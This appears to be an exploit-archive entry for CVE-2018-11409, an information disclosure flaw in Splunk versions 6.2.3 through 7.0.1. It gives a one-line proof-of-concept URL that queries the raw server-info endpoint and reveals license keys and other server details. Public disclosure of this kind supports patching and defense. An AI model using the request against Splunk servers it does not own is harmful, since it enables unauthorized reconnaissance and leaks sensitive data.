Splunk 6.2.3 / 7.0.1 Information Disclosure

Related Vulnerabilities: CVE-2018-11409  
Publish Date: 11 Jun 2018
Author: KoF2002
                # Exploit Title: Splunk < 7.0.1 - Information Disclosure
# Date: 2018-05-23
# Exploit Author: KoF2002
# Vendor Homepage: https://www.splunk.com/
# Version: 6.2.3 - 7.01 MAYBE ALL VERSION AFFECTED
# Tested on: Linux OS
# CVE : CVE-2018-11409
 
# Splunk through 6.2.3 7.0.1 allows information disclosure by appending
# /__raw/services/server/info/server-info?output_mode=json to a query,
# as demonstrated by discovering a license key and other information.
 
# PoC :
 
https://127.0.0.1:8000/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json
 
# Greats : Cold z3ro , ihab pal and all HTLovers "We Are Back"


<p>